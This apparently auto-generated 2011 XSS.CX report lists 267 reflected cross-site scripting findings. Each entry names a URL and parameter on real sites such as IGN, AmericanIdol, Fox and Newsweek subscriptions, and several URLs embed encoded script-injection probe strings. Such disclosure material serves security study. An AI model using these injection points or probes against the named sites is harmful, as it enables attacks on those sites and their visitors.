XSS, Reflected Cross Site Scripting, CWE-79, CAPEC-86, DORK, GHDB, BHDB, 10052011-01

Report generated by XSS.CX at Wed Oct 05 09:00:35 CDT 2011.

Public Domain Vulnerability Information, Security Articles, Vulnerability Reports, GHDB, DORK Search

XSS Home | XSS Crawler | SQLi Crawler | HTTPi Crawler | FI Crawler |
Loading

1. Cross-site scripting (reflected)

1.1. http://1c6e2.v.fwmrm.net/ad/g/1 [asid parameter]

1.2. http://1c6e2.v.fwmrm.net/ad/g/1 [caid parameter]

1.3. http://1c6e2.v.fwmrm.net/ad/g/1 [csid parameter]

1.4. http://1c6e2.v.fwmrm.net/ad/g/1 [flag parameter]

1.5. http://1c6e2.v.fwmrm.net/ad/g/1 [pvrn parameter]

1.6. http://1c6e2.v.fwmrm.net/ad/g/1 [slid parameter]

1.7. http://1c6e2.v.fwmrm.net/ad/g/1 [slid parameter]

1.8. http://1c6e2.v.fwmrm.net/ad/g/1 [ssid parameter]

1.9. http://1c6e2.v.fwmrm.net/ad/g/1 [vprn parameter]

1.10. http://a.collective-media.net/adj/iblocal.3interactive.ron/n7061_728ros [REST URL parameter 2]

1.11. http://a.collective-media.net/adj/iblocal.3interactive.ron/n7061_728ros [REST URL parameter 3]

1.12. http://a.collective-media.net/adj/iblocal.3interactive.ron/n7061_728ros [kw parameter]

1.13. http://a.collective-media.net/adj/iblocal.3interactive.ron/n7061_728ros [name of an arbitrarily supplied request parameter]

1.14. http://a.collective-media.net/cmadj/iblocal.3interactive.ron/n7061_728ros [REST URL parameter 1]

1.15. http://a.collective-media.net/cmadj/iblocal.3interactive.ron/n7061_728ros [REST URL parameter 2]

1.16. http://a.collective-media.net/cmadj/iblocal.3interactive.ron/n7061_728ros [REST URL parameter 3]

1.17. http://a.collective-media.net/cmadj/iblocal.3interactive.ron/n7061_728ros [kw parameter]

1.18. http://ad.technoratimedia.com/st [name of an arbitrarily supplied request parameter]

1.19. http://adsfac.eu/ag.asp [cc parameter]

1.20. http://adsfac.net/ag.asp [cc parameter]

1.21. http://api.echoenabled.com/api/v1/search [q parameter]

1.22. http://api.echoenabled.com/v1/search [q parameter]

1.23. http://b.scorecardresearch.com/beacon.js [c1 parameter]

1.24. http://b.scorecardresearch.com/beacon.js [c2 parameter]

1.25. http://b.scorecardresearch.com/beacon.js [c3 parameter]

1.26. http://b.scorecardresearch.com/beacon.js [c4 parameter]

1.27. http://b.scorecardresearch.com/beacon.js [c5 parameter]

1.28. http://b.scorecardresearch.com/beacon.js [c6 parameter]

1.29. http://c.brightcove.com/services/messagebroker/amf [3rd AMF string parameter]

1.30. http://cdn-cms.scout.com/feeds/analyticsfeed.ashx [callback parameter]

1.31. http://cdn-forums.scout.com/adfeed.ashx [callback parameter]

1.32. http://corp.ign.com/contact/ [name of an arbitrarily supplied request parameter]

1.33. http://corp.ign.com/contact/ [name of an arbitrarily supplied request parameter]

1.34. http://d7.zedo.com/jsc/d3/fl.js [p parameter]

1.35. http://link.theplatform.com/s/fox.com/JV5bOqASsrxR [REST URL parameter 1]

1.36. http://link.theplatform.com/s/fox.com/JV5bOqASsrxR [feed parameter]

1.37. http://link.theplatform.com/s/fox.com/JV5bOqASsrxR [format parameter]

1.38. http://media.sensis.com.au/hserver/acc_random=322638453351/SITE=3RD.NRL.SPORT/AREA=SPORT.NRL.HOME/AAMSZ=100x29/POSITION=headernav/pageid=428471513939 [REST URL parameter 1]

1.39. http://media.sensis.com.au/hserver/acc_random=322638453351/SITE=3RD.NRL.SPORT/AREA=SPORT.NRL.HOME/AAMSZ=100x29/POSITION=headernav/pageid=428471513939 [REST URL parameter 2]

1.40. http://media.sensis.com.au/hserver/acc_random=322638453351/SITE=3RD.NRL.SPORT/AREA=SPORT.NRL.HOME/AAMSZ=100x29/POSITION=headernav/pageid=428471513939 [name of an arbitrarily supplied request parameter]

1.41. http://media.sensis.com.au/hserver/acc_random=520099757497/SITE=3RD.NRL.SPORT/AREA=SPORT.NRL.HOME/AAMSZ=100x29/POSITION=headernav/pageid=473974383947 [REST URL parameter 1]

1.42. http://media.sensis.com.au/hserver/acc_random=520099757497/SITE=3RD.NRL.SPORT/AREA=SPORT.NRL.HOME/AAMSZ=100x29/POSITION=headernav/pageid=473974383947 [REST URL parameter 2]

1.43. http://media.sensis.com.au/hserver/acc_random=520099757497/SITE=3RD.NRL.SPORT/AREA=SPORT.NRL.HOME/AAMSZ=100x29/POSITION=headernav/pageid=473974383947 [name of an arbitrarily supplied request parameter]

1.44. http://media.sensis.com.au/hserver/acc_random=530591826287/SITE=3RD.NRL.SPORT/AAMSZ=1x1/AREA=SPORT.NRL.HOME/POSITION=BLW1 [REST URL parameter 1]

1.45. http://media.sensis.com.au/hserver/acc_random=530591826287/SITE=3RD.NRL.SPORT/AAMSZ=1x1/AREA=SPORT.NRL.HOME/POSITION=BLW1 [REST URL parameter 2]

1.46. http://media.sensis.com.au/hserver/acc_random=530591826287/SITE=3RD.NRL.SPORT/AAMSZ=1x1/AREA=SPORT.NRL.HOME/POSITION=BLW1 [name of an arbitrarily supplied request parameter]

1.47. http://media.sensis.com.au/hserver/acc_random=589525886771/SITE=3RD.NRL.SPORT/AAMSZ=1x1/AREA=SPORT.NRL.HOME/POSITION=BLW1 [REST URL parameter 1]

1.48. http://media.sensis.com.au/hserver/acc_random=589525886771/SITE=3RD.NRL.SPORT/AAMSZ=1x1/AREA=SPORT.NRL.HOME/POSITION=BLW1 [REST URL parameter 2]

1.49. http://media.sensis.com.au/hserver/acc_random=589525886771/SITE=3RD.NRL.SPORT/AAMSZ=1x1/AREA=SPORT.NRL.HOME/POSITION=BLW1 [name of an arbitrarily supplied request parameter]

1.50. http://media.sensis.com.au/hserver/acc_random=607344386581/SITE=3RD.BPPROMO.NRL.SPORT/AAMSZ=300x70/AREA=SPORT.NRL.HOME/POSITION=BLW1 [REST URL parameter 1]

1.51. http://media.sensis.com.au/hserver/acc_random=607344386581/SITE=3RD.BPPROMO.NRL.SPORT/AAMSZ=300x70/AREA=SPORT.NRL.HOME/POSITION=BLW1 [REST URL parameter 2]

1.52. http://media.sensis.com.au/hserver/acc_random=607344386581/SITE=3RD.BPPROMO.NRL.SPORT/AAMSZ=300x70/AREA=SPORT.NRL.HOME/POSITION=BLW1 [name of an arbitrarily supplied request parameter]

1.53. http://media.sensis.com.au/hserver/acc_random=849967399710/SITE=3RD.NRL.SPORT/AAMSZ=4x1/AREA=SPORT.NRL.HOME/POSITION=BLW1 [REST URL parameter 1]

1.54. http://media.sensis.com.au/hserver/acc_random=849967399710/SITE=3RD.NRL.SPORT/AAMSZ=4x1/AREA=SPORT.NRL.HOME/POSITION=BLW1 [REST URL parameter 2]

1.55. http://media.sensis.com.au/hserver/acc_random=849967399710/SITE=3RD.NRL.SPORT/AAMSZ=4x1/AREA=SPORT.NRL.HOME/POSITION=BLW1 [name of an arbitrarily supplied request parameter]

1.56. http://media.sensis.com.au/hserver/acc_random=86235691049/SITE=3RD.NRL.SPORT/AAMSZ=4x1/AREA=SPORT.NRL.HOME/POSITION=BLW1 [REST URL parameter 1]

1.57. http://media.sensis.com.au/hserver/acc_random=86235691049/SITE=3RD.NRL.SPORT/AAMSZ=4x1/AREA=SPORT.NRL.HOME/POSITION=BLW1 [REST URL parameter 2]

1.58. http://media.sensis.com.au/hserver/acc_random=86235691049/SITE=3RD.NRL.SPORT/AAMSZ=4x1/AREA=SPORT.NRL.HOME/POSITION=BLW1 [name of an arbitrarily supplied request parameter]

1.59. http://media.sensis.com.au/hserver/acc_random=956894257036/SITE=3RD.BPPROMO.NRL.SPORT/AAMSZ=300x70/AREA=SPORT.NRL.HOME/POSITION=BLW1 [REST URL parameter 1]

1.60. http://media.sensis.com.au/hserver/acc_random=956894257036/SITE=3RD.BPPROMO.NRL.SPORT/AAMSZ=300x70/AREA=SPORT.NRL.HOME/POSITION=BLW1 [REST URL parameter 2]

1.61. http://media.sensis.com.au/hserver/acc_random=956894257036/SITE=3RD.BPPROMO.NRL.SPORT/AAMSZ=300x70/AREA=SPORT.NRL.HOME/POSITION=BLW1 [name of an arbitrarily supplied request parameter]

1.62. http://my.careerone.com.au/services/adservices/getcommonadurl.ashx [applicationid parameter]

1.63. http://my.careerone.com.au/services/adservices/getcommonadurl.ashx [path parameter]

1.64. http://myidol.americanidol.com/ie7-styles.css [REST URL parameter 1]

1.65. http://myidol.americanidol.com/images/css/newforum.css [REST URL parameter 3]

1.66. http://myidol.americanidol.com/images/webfontkit/helveticaneuew02-75bold-webfont.woff [REST URL parameter 3]

1.67. http://myidol.americanidol.com/png_fix.css [REST URL parameter 1]

1.68. http://myidol.americanidol.com/tiny-edit.css [REST URL parameter 1]

1.69. http://pglb.buzzfed.com/32418/5cca846e8e7b10d1bec731ed34643e04 [callback parameter]

1.70. http://pglb.buzzfed.com/32418/774318d75531cfaededa3a9d2cbab383 [callback parameter]

1.71. http://pglb.buzzfed.com/39698/6d0094ff6569058b09e6fab4d74b9fcb [callback parameter]

1.72. http://pglb.buzzfed.com/39698/6f8f1f6be3a9e039f40348adbcc25b28 [callback parameter]

1.73. http://pglb.buzzfed.com/39698/f959d1ec5ce0f34205021b068f0f6899 [callback parameter]

1.74. http://social-services.ign.com/v1.0/social/rest/people/fedreg.150067215/@self [jsonp parameter]

1.75. http://social-services.ign.com/v1.0/social/rest/people/fedreg.233293577/@self [jsonp parameter]

1.76. http://social-services.ign.com/v1.0/social/rest/people/fedreg.259795679/@self [jsonp parameter]

1.77. http://social-services.ign.com/v1.0/social/rest/people/fedreg.78864510/@self [jsonp parameter]

1.78. http://social-services.ign.com/v1.0/social/rest/people/nickname.Interoceter%20/@self [jsonp parameter]

1.79. http://support.igninsider.com/ics/support/default.asp [name of an arbitrarily supplied request parameter]

1.80. http://trc.taboolasyndication.com/ign-askmen/trc/2/json [cb parameter]

1.81. http://widgets.ign.com/disqus/comment/comment/ign-articles/1197949.jsonp [callback parameter]

1.82. http://widgets.ign.com/global/page/followus.jsonp [callback parameter]

1.83. http://widgets.myidol.americanidol.com/js/recentActivity/view [REST URL parameter 1]

1.84. http://widgets.myidol.americanidol.com/js/recentActivity/view [REST URL parameter 2]

1.85. http://widgets.myidol.americanidol.com/js/recentActivity/view [REST URL parameter 3]

1.86. http://widgets.myidol.americanidol.com/js/recentActivity/view [cookieFailInstantRedirect parameter]

1.87. http://widgets.myidol.americanidol.com/js/recentActivity/view [devkey parameter]

1.88. http://widgets.myidol.americanidol.com/js/recentActivity/view [ms parameter]

1.89. http://widgets.myidol.americanidol.com/js/recentActivity/view [name of an arbitrarily supplied request parameter]

1.90. http://widgets.myidol.americanidol.com/js/recentActivity/view [num parameter]

1.91. http://widgets.myidol.americanidol.com/js/recentActivity/view [one_widget_node parameter]

1.92. http://widgets.myidol.americanidol.com/js/recentActivity/view [title parameter]

1.93. http://widgets.myidol.americanidol.com/js/recentActivity/view [view parameter]

1.94. http://widgets.myidol.americanidol.com/js/recentActivity/view [wurl parameter]

1.95. http://widgets.myidol.americanidol.com/redirect.one [redirect_to parameter]

1.96. http://widgets.myidol.americanidol.com/tools/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000051)%3C/script%3E [REST URL parameter 1]

1.97. http://widgets.myidol.americanidol.com/tools/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000051)%3C/script%3E [REST URL parameter 1]

1.98. http://widgets.myidol.americanidol.com/tools/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000051)%3C/script%3E [REST URL parameter 1]

1.99. http://widgets.myidol.americanidol.com/tools/Netsparkerdcf8046f3ca84302a46153adee19582b/ [REST URL parameter 1]

1.100. http://widgets.myidol.americanidol.com/tools/Netsparkerdcf8046f3ca84302a46153adee19582b/ [REST URL parameter 1]

1.101. http://widgets.myidol.americanidol.com/tools/jwk%EF%BF%BD%0Du%EF%BF%BD%EF%BF%BD%5Er%EF%BF%BD(%EF%BF%BD%7B/ [REST URL parameter 1]

1.102. http://widgets.myidol.americanidol.com/tools/jwk%EF%BF%BD%0Du%EF%BF%BD%EF%BF%BD%5Er%EF%BF%BD(%EF%BF%BD%7B/%EF%BF%BDw%1A%EF%BF%BD [REST URL parameter 1]

1.103. http://widgets.myidol.americanidol.com/tools/jwk%EF%BF%BD%0Du%EF%BF%BD%EF%BF%BD%5Er%EF%BF%BD(%EF%BF%BD%7B/Netsparker8f4d94ef206e4e3b82c23a8a89d01567/ [REST URL parameter 1]

1.104. http://widgets.myidol.americanidol.com/tools/keyslave.one'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000046)%3C/script%3E [REST URL parameter 1]

1.105. http://widgets.myidol.americanidol.com/tools/keyslave.one'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000046)%3C/script%3E [REST URL parameter 1]

1.106. http://widgets.myidol.americanidol.com/tools/keyslave.one'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000046)%3C/script%3E [REST URL parameter 1]

1.107. http://widgets.myidol.americanidol.com/tools/keyslave.one/%22ns=%22netsparker(0x00004A) [REST URL parameter 1]

1.108. http://widgets.myidol.americanidol.com/tools/keyslave.one/%22ns=%22netsparker(0x00004A) [REST URL parameter 1]

1.109. http://widgets.myidol.americanidol.com/tools/keyslave.one/%2522ns%253D%2522netsparker%25280x00004B%2529) [REST URL parameter 1]

1.110. http://widgets.myidol.americanidol.com/tools/keyslave.one/%2522ns%253D%2522netsparker%25280x00004B%2529) [REST URL parameter 1]

1.111. http://wrapper.askmen.com/a [name of an arbitrarily supplied request parameter]

1.112. http://wrapper.ign.com/a [name of an arbitrarily supplied request parameter]

1.113. http://wrapper.ign.com/a [pagetype parameter]

1.114. http://www.americanidol.com/photos/hothome/ [all parameter]

1.115. http://www.americanidol.com/photos/hothome/ [feed parameter]

1.116. http://www.americanidol.com/photos/hothome/ [name of an arbitrarily supplied request parameter]

1.117. http://www.americanidol.com/videos/hot/qty/12 [REST URL parameter 3]

1.118. http://www.americanidol.com/videos/hot/qty/12 [REST URL parameter 4]

1.119. http://www.americanidol.com/videos/hot/qty/12 [dfpzone parameter]

1.120. http://www.americanidol.com/videos/hot/qty/12 [feed parameter]

1.121. http://www.americanidol.com/videos/hot/qty/12 [name of an arbitrarily supplied request parameter]

1.122. http://www.americanidol.com/videos/hot/qty/12/ [REST URL parameter 3]

1.123. http://www.americanidol.com/videos/hot/qty/12/ [REST URL parameter 4]

1.124. http://www.americanidol.com/videos/hot/qty/12/ [feed parameter]

1.125. http://www.americanidol.com/videos/hot/qty/12/ [name of an arbitrarily supplied request parameter]

1.126. http://www.askmen.com/api/articles/getTodaysArticles/country:us.json&ttl=86400&jsoncallback=jQuery16105530000370927155_1317758809762 [REST URL parameter 1]

1.127. http://www.askmen.com/includes/js/am/min.php [REST URL parameter 1]

1.128. http://www.askmen.com/includes/js/am/min.php [REST URL parameter 2]

1.129. http://www.askmen.com/includes/js/am/min.php [REST URL parameter 3]

1.130. http://www.askmen.com/includes/js/am/min.php [REST URL parameter 4]

1.131. http://www.askmen.com/includes/views/helpers/cache.php [REST URL parameter 1]

1.132. http://www.askmen.com/includes/views/helpers/cache.php [REST URL parameter 2]

1.133. http://www.askmen.com/includes/views/helpers/cache.php [REST URL parameter 3]

1.134. http://www.askmen.com/includes/views/helpers/cache.php [REST URL parameter 4]

1.135. http://www.askmen.com/includes/views/helpers/cache.php [jsoncallback parameter]

1.136. http://www.askmen.com/top_10/cars/fastest-cars-in-the-world.html [REST URL parameter 1]

1.137. http://www.askmen.com/top_10/cars/fastest-cars-in-the-world.html [REST URL parameter 2]

1.138. http://www.askmen.com/top_10/cars/fastest-cars-in-the-world.html [REST URL parameter 3]

1.139. http://www.carsguide.com.au/search/ [name of an arbitrarily supplied request parameter]

1.140. http://www.carsguide.com.au/search/ [name of an arbitrarily supplied request parameter]

1.141. http://www.carsguide.com.au/search/ [name of an arbitrarily supplied request parameter]

1.142. http://www.carsguide.com.au/search/ [name of an arbitrarily supplied request parameter]

1.143. http://www.carsguide.com.au/search/ [origin parameter]

1.144. http://www.carsguide.com.au/search/ [origin parameter]

1.145. http://www.carsguide.com.au/search/ [origin parameter]

1.146. http://www.carsguide.com.au/search/ [origin parameter]

1.147. http://www.fox.com/_ugc/xml/homepage_ep_2011-10-4.xml [REST URL parameter 1]

1.148. http://www.fox.com/_ugc/xml/homepage_ep_2011-10-4.xml [REST URL parameter 2]

1.149. http://www.fox.com/_ugc/xml/homepage_ep_2011-10-4.xml [REST URL parameter 3]

1.150. http://www.fox.com/_ui/fox_player/swf/FoxAnalyticsExtension.swf [REST URL parameter 1]

1.151. http://www.fox.com/_ui/fox_player/swf/FoxAnalyticsExtension.swf [REST URL parameter 2]

1.152. http://www.fox.com/_ui/fox_player/swf/FoxAnalyticsExtension.swf [REST URL parameter 3]

1.153. http://www.fox.com/_ui/fox_player/swf/FoxLayoutPlugIn.swf [REST URL parameter 1]

1.154. http://www.fox.com/_ui/fox_player/swf/FoxLayoutPlugIn.swf [REST URL parameter 2]

1.155. http://www.fox.com/_ui/fox_player/swf/FoxLayoutPlugIn.swf [REST URL parameter 3]

1.156. http://www.fox.com/_ui/fox_player/swf/FoxOmnitureMonitor.swf [REST URL parameter 1]

1.157. http://www.fox.com/_ui/fox_player/swf/FoxOmnitureMonitor.swf [REST URL parameter 2]

1.158. http://www.fox.com/_ui/fox_player/swf/FoxOmnitureMonitor.swf [REST URL parameter 3]

1.159. http://www.fox.com/_ui/fox_player/swf/akamaiHD.swf [REST URL parameter 1]

1.160. http://www.fox.com/_ui/fox_player/swf/akamaiHD.swf [REST URL parameter 2]

1.161. http://www.fox.com/_ui/fox_player/swf/akamaiHD.swf [REST URL parameter 3]

1.162. http://www.fox.com/_ui/fox_player/swf/authentication.swf [REST URL parameter 1]

1.163. http://www.fox.com/_ui/fox_player/swf/authentication.swf [REST URL parameter 2]

1.164. http://www.fox.com/_ui/fox_player/swf/authentication.swf [REST URL parameter 3]

1.165. http://www.fox.com/_ui/fox_player/swf/foxComscoreResolverPlugIn.swf [REST URL parameter 1]

1.166. http://www.fox.com/_ui/fox_player/swf/foxComscoreResolverPlugIn.swf [REST URL parameter 2]

1.167. http://www.fox.com/_ui/fox_player/swf/foxComscoreResolverPlugIn.swf [REST URL parameter 3]

1.168. http://www.fox.com/_ui/fox_player/swf/foxUrlSigningPlugIn.swf [REST URL parameter 1]

1.169. http://www.fox.com/_ui/fox_player/swf/foxUrlSigningPlugIn.swf [REST URL parameter 2]

1.170. http://www.fox.com/_ui/fox_player/swf/foxUrlSigningPlugIn.swf [REST URL parameter 3]

1.171. http://www.fox.com/_ui/fox_player/swf/ggtp370.swf [REST URL parameter 1]

1.172. http://www.fox.com/_ui/fox_player/swf/ggtp370.swf [REST URL parameter 2]

1.173. http://www.fox.com/_ui/fox_player/swf/ggtp370.swf [REST URL parameter 3]

1.174. http://www.fox.com/_ui/fox_player/swf/omnitureMedia.swf [REST URL parameter 1]

1.175. http://www.fox.com/_ui/fox_player/swf/omnitureMedia.swf [REST URL parameter 2]

1.176. http://www.fox.com/_ui/fox_player/swf/omnitureMedia.swf [REST URL parameter 3]

1.177. http://www.fox.com/_ui/fox_player/videoXml.php [REST URL parameter 1]

1.178. http://www.fox.com/_ui/fox_player/videoXml.php [REST URL parameter 2]

1.179. http://www.fox.com/_ui/js/combinedjs.php [REST URL parameter 1]

1.180. http://www.fox.com/_ui/js/combinedjs.php [REST URL parameter 2]

1.181. http://www.ign.com/ [name of an arbitrarily supplied request parameter]

1.182. http://www.ign.com/ [name of an arbitrarily supplied request parameter]

1.183. http://www.ign.com/index/features.html [name of an arbitrarily supplied request parameter]

1.184. http://www.ign.com/index/features.html [name of an arbitrarily supplied request parameter]

1.185. http://www.ign.com/videos/2011/08/15/batman-arkham-city-mr-freeze-trailer [name of an arbitrarily supplied request parameter]

1.186. http://www.ign.com/videos/2011/08/31/uncharted-3-drakes-deception-cargo-plane-demo-part-2 [name of an arbitrarily supplied request parameter]

1.187. http://www.ign.com/videos/2011/09/15/rage-launch-trailer [name of an arbitrarily supplied request parameter]

1.188. http://www.ign.com/videos/2011/09/16/battlefield-3-operation-guillotine-gameplay-trailer [name of an arbitrarily supplied request parameter]

1.189. http://www.newsspace.com.au/digital [REST URL parameter 1]

1.190. http://www.newsspace.com.au/digital [REST URL parameter 1]

1.191. http://www.newsspace.com.au/news.com.au [REST URL parameter 1]

1.192. http://www.newsspace.com.au/news.com.au [REST URL parameter 1]

1.193. https://www.newsweeksubscriptions.com/4freetrial29/index.php [REST URL parameter 1]

1.194. https://www.newsweeksubscriptions.com/4freetrial29/index.php [REST URL parameter 2]

1.195. https://www.newsweeksubscriptions.com/4freetrial29/index.php [name of an arbitrarily supplied request parameter]

1.196. https://www.newsweeksubscriptions.com/4freetrial29/index.php [name of an arbitrarily supplied request parameter]

1.197. https://www.newsweeksubscriptions.com/4freetrial29/index.php [off2on_code parameter]

1.198. https://www.newsweeksubscriptions.com/4freetrial29/index.php [off2on_code parameter]

1.199. https://www.newsweeksubscriptions.com/4freetrial29/index.php [off2on_login_url parameter]

1.200. https://www.newsweeksubscriptions.com/4freetrial29/index.php [off2on_login_url parameter]

1.201. https://www.newsweeksubscriptions.com/702FT [REST URL parameter 1]

1.202. https://www.newsweeksubscriptions.com/FTcontrol/ [REST URL parameter 1]

1.203. https://www.newsweeksubscriptions.com/FTcontrol/Netsparker1c7b16f68f3d4364880fe7b87f27e95f.com [REST URL parameter 1]

1.204. https://www.newsweeksubscriptions.com/FTcontrol/Netsparker1c7b16f68f3d4364880fe7b87f27e95f.com [REST URL parameter 2]

1.205. https://www.newsweeksubscriptions.com/FTcontrol/Netsparker2cbd166ae342433790df4a67a21c6752.com [REST URL parameter 1]

1.206. https://www.newsweeksubscriptions.com/FTcontrol/Netsparker2cbd166ae342433790df4a67a21c6752.com [REST URL parameter 2]

1.207. https://www.newsweeksubscriptions.com/FTcontrol/Netsparker3b11d2a9bea74309b717ec15a61a0c4d.php [REST URL parameter 1]

1.208. https://www.newsweeksubscriptions.com/FTcontrol/Netsparker3b11d2a9bea74309b717ec15a61a0c4d.php [REST URL parameter 2]

1.209. https://www.newsweeksubscriptions.com/FTcontrol/Netsparker3b11d2a9bea74309b717ec15a61a0c4d.php [name of an arbitrarily supplied request parameter]

1.210. https://www.newsweeksubscriptions.com/FTcontrol/Netsparker58012c2b005441ad8f20a8853507792a/ [REST URL parameter 1]

1.211. https://www.newsweeksubscriptions.com/FTcontrol/Netsparker58012c2b005441ad8f20a8853507792a/ [REST URL parameter 2]

1.212. https://www.newsweeksubscriptions.com/FTcontrol/Netsparker8fc0818469324be7a66e95df89352dfc/ [REST URL parameter 1]

1.213. https://www.newsweeksubscriptions.com/FTcontrol/Netsparker8fc0818469324be7a66e95df89352dfc/ [REST URL parameter 2]

1.214. https://www.newsweeksubscriptions.com/FTcontrol/Netsparker9c20edd6e26f4a64a5de76b93f6d2c6a.com [REST URL parameter 1]

1.215. https://www.newsweeksubscriptions.com/FTcontrol/Netsparker9c20edd6e26f4a64a5de76b93f6d2c6a.com [REST URL parameter 2]

1.216. https://www.newsweeksubscriptions.com/FTcontrol/Netsparkerceebc4dbfcc143b494a66c3da72069d9.php [REST URL parameter 1]

1.217. https://www.newsweeksubscriptions.com/FTcontrol/Netsparkerceebc4dbfcc143b494a66c3da72069d9.php [REST URL parameter 2]

1.218. https://www.newsweeksubscriptions.com/FTcontrol/Netsparkerceebc4dbfcc143b494a66c3da72069d9.php [name of an arbitrarily supplied request parameter]

1.219. https://www.newsweeksubscriptions.com/FTcontrol/Netsparkere98c4e85f0b1457bbaf0092f8f6c53a1/ [REST URL parameter 1]

1.220. https://www.newsweeksubscriptions.com/FTcontrol/Netsparkere98c4e85f0b1457bbaf0092f8f6c53a1/ [REST URL parameter 2]

1.221. https://www.newsweeksubscriptions.com/FTcontrol/Netsparkerff94eb7d76d845a0bbb384e1e536ae1c.php [REST URL parameter 1]

1.222. https://www.newsweeksubscriptions.com/FTcontrol/Netsparkerff94eb7d76d845a0bbb384e1e536ae1c.php [REST URL parameter 2]

1.223. https://www.newsweeksubscriptions.com/FTcontrol/Netsparkerff94eb7d76d845a0bbb384e1e536ae1c.php [name of an arbitrarily supplied request parameter]

1.224. https://www.newsweeksubscriptions.com/FTcontrol/index.php [REST URL parameter 1]

1.225. https://www.newsweeksubscriptions.com/FTcontrol/index.php [REST URL parameter 1]

1.226. https://www.newsweeksubscriptions.com/FTcontrol/index.php [REST URL parameter 2]

1.227. https://www.newsweeksubscriptions.com/FTcontrol/index.php [REST URL parameter 2]

1.228. https://www.newsweeksubscriptions.com/FTcontrol/index.php [address parameter]

1.229. https://www.newsweeksubscriptions.com/FTcontrol/index.php [address2 parameter]

1.230. https://www.newsweeksubscriptions.com/FTcontrol/index.php [city parameter]

1.231. https://www.newsweeksubscriptions.com/FTcontrol/index.php [name of an arbitrarily supplied request parameter]

1.232. https://www.newsweeksubscriptions.com/FTcontrol/index.php [name of an arbitrarily supplied request parameter]

1.233. https://www.newsweeksubscriptions.com/FTcontrol/index.php [name parameter]

1.234. https://www.newsweeksubscriptions.com/FTcontrol/index.php [off2on_code parameter]

1.235. https://www.newsweeksubscriptions.com/FTcontrol/index.php [off2on_code parameter]

1.236. https://www.newsweeksubscriptions.com/FTcontrol/index.php [off2on_login_url parameter]

1.237. https://www.newsweeksubscriptions.com/FTcontrol/index.php [off2on_login_url parameter]

1.238. https://www.newsweeksubscriptions.com/FTcontrol/index.php [paym parameter]

1.239. https://www.newsweeksubscriptions.com/FTcontrol/index.php [sessid parameter]

1.240. https://www.newsweeksubscriptions.com/FTcontrol/index.php [state parameter]

1.241. https://www.newsweeksubscriptions.com/FTcontrol/newsweek@emailcustomerservice.com [REST URL parameter 1]

1.242. https://www.newsweeksubscriptions.com/FTcontrol/newsweek@emailcustomerservice.com [REST URL parameter 2]

1.243. https://www.newsweeksubscriptions.com/FTcontrol/newsweek@emailcustomerservice.com/ [REST URL parameter 1]

1.244. https://www.newsweeksubscriptions.com/FTcontrol/newsweek@emailcustomerservice.com/ [REST URL parameter 2]

1.245. https://www.newsweeksubscriptions.com/FTcontrol/newsweek@emailcustomerservice.com/Netsparker0b594b604acd4cc2b9db63005bfbe9af/ [REST URL parameter 1]

1.246. https://www.newsweeksubscriptions.com/FTcontrol/newsweek@emailcustomerservice.com/Netsparker0b594b604acd4cc2b9db63005bfbe9af/ [REST URL parameter 2]

1.247. https://www.newsweeksubscriptions.com/FTcontrol/newsweek@emailcustomerservice.com/Netsparker0b594b604acd4cc2b9db63005bfbe9af/ [REST URL parameter 3]

1.248. https://www.newsweeksubscriptions.com/FTcontrol/newsweek@emailcustomerservice.com/Netsparker589cd9fdeb73414b91501b3a353febd5/ [REST URL parameter 1]

1.249. https://www.newsweeksubscriptions.com/FTcontrol/newsweek@emailcustomerservice.com/Netsparker589cd9fdeb73414b91501b3a353febd5/ [REST URL parameter 2]

1.250. https://www.newsweeksubscriptions.com/FTcontrol/newsweek@emailcustomerservice.com/Netsparker589cd9fdeb73414b91501b3a353febd5/ [REST URL parameter 3]

1.251. https://www.newsweeksubscriptions.com/FTcontrol/newsweek@emailcustomerservice.com/Netsparkerd186b3ae09c841c6bee1f9d4f0873575/ [REST URL parameter 1]

1.252. https://www.newsweeksubscriptions.com/FTcontrol/newsweek@emailcustomerservice.com/Netsparkerd186b3ae09c841c6bee1f9d4f0873575/ [REST URL parameter 2]

1.253. https://www.newsweeksubscriptions.com/FTcontrol/newsweek@emailcustomerservice.com/Netsparkerd186b3ae09c841c6bee1f9d4f0873575/ [REST URL parameter 3]

1.254. https://www.newsweeksubscriptions.com/FTcontrol/www.newsweek.com/ [REST URL parameter 1]

1.255. https://www.newsweeksubscriptions.com/FTcontrol/www.newsweek.com/ [REST URL parameter 2]

1.256. https://www.newsweeksubscriptions.com/FTcontrol/www.newsweek.com/Netsparker3215122ba390411b8fddefdc9096119b/ [REST URL parameter 1]

1.257. https://www.newsweeksubscriptions.com/FTcontrol/www.newsweek.com/Netsparker3215122ba390411b8fddefdc9096119b/ [REST URL parameter 2]

1.258. https://www.newsweeksubscriptions.com/FTcontrol/www.newsweek.com/Netsparker3215122ba390411b8fddefdc9096119b/ [REST URL parameter 3]

1.259. https://www.newsweeksubscriptions.com/FTcontrol/www.newsweek.com/Netsparker3488b5ca6f704b4db379c689563ca325/ [REST URL parameter 1]

1.260. https://www.newsweeksubscriptions.com/FTcontrol/www.newsweek.com/Netsparker3488b5ca6f704b4db379c689563ca325/ [REST URL parameter 2]

1.261. https://www.newsweeksubscriptions.com/FTcontrol/www.newsweek.com/Netsparker3488b5ca6f704b4db379c689563ca325/ [REST URL parameter 3]

1.262. https://www.newsweeksubscriptions.com/FTcontrol/www.newsweek.com/Netsparker37c19d3edd97406aa7aeff8e0b4b8858 [REST URL parameter 1]

1.263. https://www.newsweeksubscriptions.com/FTcontrol/www.newsweek.com/Netsparker37c19d3edd97406aa7aeff8e0b4b8858 [REST URL parameter 2]

1.264. https://www.newsweeksubscriptions.com/FTcontrol/www.newsweek.com/Netsparker37c19d3edd97406aa7aeff8e0b4b8858 [REST URL parameter 3]

1.265. https://www.newsweeksubscriptions.com/FTcontrol/www.newsweek.com/Netsparker88468e5892914e859ede199ce9b7be76/ [REST URL parameter 1]

1.266. https://www.newsweeksubscriptions.com/FTcontrol/www.newsweek.com/Netsparker88468e5892914e859ede199ce9b7be76/ [REST URL parameter 2]

1.267. https://www.newsweeksubscriptions.com/FTcontrol/www.newsweek.com/Netsparker88468e5892914e859ede199ce9b7be76/ [REST URL parameter 3]

